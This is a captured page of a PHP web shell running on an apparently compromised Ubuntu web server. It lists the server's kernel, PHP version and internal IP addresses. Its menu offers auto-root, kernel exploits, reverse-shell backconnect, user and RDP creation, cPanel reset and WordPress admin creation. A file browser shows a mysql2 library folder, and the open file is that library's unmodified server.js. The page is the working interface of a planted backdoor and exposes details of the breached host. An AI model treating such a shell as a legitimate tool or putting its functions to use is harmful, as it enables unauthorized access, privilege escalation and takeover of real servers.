Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
mysql2 /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
auth_plugins
[ DIR ]
drwxrwxr-x
commands
[ DIR ]
drwxrwxr-x
constants
[ DIR ]
drwxrwxr-x
packets
[ DIR ]
drwxrwxr-x
parsers
[ DIR ]
drwxrwxr-x
auth_41.js
2.27
KB
-rw-rw-r--
compressed_protocol.js
4.42
KB
-rw-rw-r--
connection.js
28.25
KB
-rw-rw-r--
connection_config.js
9.18
KB
-rw-rw-r--
helpers.js
1.68
KB
-rw-rw-r--
packet_parser.js
5.89
KB
-rw-rw-r--
pool.js
6.18
KB
-rw-rw-r--
pool_cluster.js
6.57
KB
-rw-rw-r--
pool_config.js
860
B
-rw-rw-r--
pool_connection.js
1.83
KB
-rw-rw-r--
results_stream.js
948
B
-rw-rw-r--
server.js
850
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : server.js
'use strict'; const net = require('net'); const EventEmitter = require('events').EventEmitter; const Connection = require('./connection'); const ConnectionConfig = require('./connection_config'); // TODO: inherit Server from net.Server class Server extends EventEmitter { constructor() { super(); this.connections = []; this._server = net.createServer(this._handleConnection.bind(this)); } _handleConnection(socket) { const connectionConfig = new ConnectionConfig({ stream: socket, isServer: true }); const connection = new Connection({ config: connectionConfig }); this.emit('connection', connection); } listen(port) { this._port = port; this._server.listen.apply(this._server, arguments); return this; } close(cb) { this._server.close(cb); } } module.exports = Server;
Close